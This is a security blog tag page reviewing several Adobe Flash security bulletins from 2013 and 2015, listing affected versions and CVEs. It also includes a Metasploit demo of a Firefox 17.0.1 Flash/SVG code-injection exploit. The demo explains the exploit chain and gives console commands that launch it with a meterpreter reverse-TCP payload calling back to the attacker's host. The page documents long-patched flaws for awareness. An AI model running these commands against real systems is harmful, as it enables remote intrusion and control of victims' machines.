Posts tagged Adobe

APSB15-32 – Adobe Flash December 2015 Security Bulletin Review

Adobe has release, the December 8th 2015, during his December Patch Tuesday, one Adobe Flash security bulletin dealing with 77 vulnerabilities. This security bulletin has a Critical severity rating.

APSB15-32 is concerning:

  • Adobe Flash Player Desktop Runtime 19.0.0.245 and earlier on Windows and Macintosh
  • Adobe Flash Player Extended Support Release 18.0.0.261 and earlier on Windows and Macintosh
  • Adobe Flash Player for Google Chrome 19.0.0.245 and earlier on Windows, Macintosh, Linux and ChromeOS
  • Adobe Flash Player for Microsoft Edge and Internet Explorer 11 19.0.0.245 and earlier on Windows 10
  • Adobe Flash Player for Internet Explorer 10 and 11 19.0.0.245 and earlier on Windows 8.0 and 8.1
  • Adobe Flash Player for Linux 11.2.202.548 and earlier on Linux
  • AIR Desktop Runtime 19.0.0.241 and earlier on Windows and Macintosh
  • AIR SDK 19.0.0.241 and earlier on Windows, Macintosh, Android and iOS
  • AIR SDK & Compiler 19.0.0.241 and earlier on Windows, Macintosh, Android and iOS
  • AIR for Android

APSB13-16 – Adobe Flash June 2013 Security Bulletin Review

Adobe has release, the June 11th 2013, during his June Patch Tuesday, one Adobe Flash security bulletin dealing with one vulnerability. This security bulletin has a Critical severity rating. The associated vulnerability has a 10.0 CVSS base score.

APSB13-16 – Adobe Flash June 2013 Security Bulletin Review

APSB13-16 is concerning :

  • Adobe Flash Player 11.7.700.202 and earlier versions for Windows
  • Adobe Flash Player 11.7.700.203 and earlier versions for Macintosh
  • Adobe Flash Player 11.2.202.285 and earlier versions for Linux
  • Adobe Flash Player 11.1.115.58 and earlier versions for Android 4.x
  • Adobe Flash Player 11.1.111.54 and earlier versions for Android 3.x and 2.x
  • Adobe AIR 3.7.0.1860 and earlier versions for Windows and Macintosh
  • Adobe AIR 3.7.0.1860 and earlier versions for Android
  • Adobe AIR 3.7.0.1860 SDK & Compiler and earlier versions

CVE-2013-3343 (10.0 CVSS base score), was discovered and privately reported by Mateusz Jurczyk and Ben Hawkes of the Google Security Team.

Firefox 17.0.1 + Flash Privileged Code Injection Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Marius Mlynski the 2012-11-21
Vulnerability corrected by vendor the 2013-01-08
Metasploit PoC provided the 2013-05-15

PoC provided by :

Marius Mlynski
joev
sinn3r

Reference(s) :

CVE-2013-0758
CVE-2013-0757
MFSA-2013-15

Affected version(s) :

Firefox 17.0.1 and previous

Tested on Windows 7 SP1 with :

Firefox 17.0.1

Description :

This exploit gains remote code execution on Firefox 17.0.1 and all previous versions, provided the user has installed Flash. No memory corruption is used. First, a Flash object is cloned into the anonymous content of the SVG “use” element in the(CVE-2013-0758). From there, the Flash object can navigate a child frame to a URL in the chrome:// scheme. Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper around the child frame’s window reference and inject code into the chrome:// context. Once we have injection into the chrome execution context, we can write the payload to disk, chmod it (if posix), and then execute. Note: Flash is used here to trigger the exploit but any Firefox plugin with script access should be able to trigger it.

Commands :

use exploit/multi/browser/firefox_svg_plugin
set SRVHOST 192.168.178.36
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo

APSB13-14 – Adobe Flash May 2013 Security Bulletin Review

Adobe has release, the May 14th 2013, during his May Patch Tuesday, one Adobe Flash security bulletin dealing with 13 vulnerabilities. This security bulletin has a Critical severity rating. The associated vulnerabilities have all a 10.0 CVSS base score.

APSB13-14 – Adobe Flash May 2013 Security Bulletin Review

APSB13-14 is concerning :

  • Adobe Flash Player 11.7.700.169 and earlier versions for Windows and Macintosh
  • Adobe Flash Player 11.2.202.280 and earlier versions for Linux
  • Adobe Flash Player 11.1.115.54 and earlier versions for Android 4.x
  • Adobe Flash Player 11.1.111.50 and earlier versions for Android 3.x and 2.x
  • Adobe AIR 3.7.0.1530 and earlier versions for Windows and Macintosh
  • Adobe AIR 3.7.0.1660 and earlier versions for Android
  • Adobe AIR 3.7.0.1530 SDK & Compiler and earlier versions

CVE-2013-2728 (10.0 CVSS base score), CVE-2013-3324 (10.0 CVSS base score), CVE-2013-3325 (10.0 CVSS base score), CVE-2013-3326 (10.0 CVSS base score), CVE-2013-3327 (10.0 CVSS base score), CVE-2013-3328 (10.0 CVSS base score), CVE-2013-3329 (10.0 CVSS base score), CVE-2013-3330 (10.0 CVSS base score), CVE-2013-3331 (10.0 CVSS base score) and CVE-2013-3332 (10.0 CVSS base score) were discovered and privately reported by Mateusz Jurczyk and Ben Hawkes of the Google Security Team.

CVE-2013-3333 (10.0 CVSS base score), CVE-2013-3334 (10.0 CVSS base score) and CVE-2013-3335 (10.0 CVSS base score) were discovered and privately reported by Mateusz Jurczyk, Gynvael Coldwind, and Fermin Serna of the Google Security Team.

Go to Top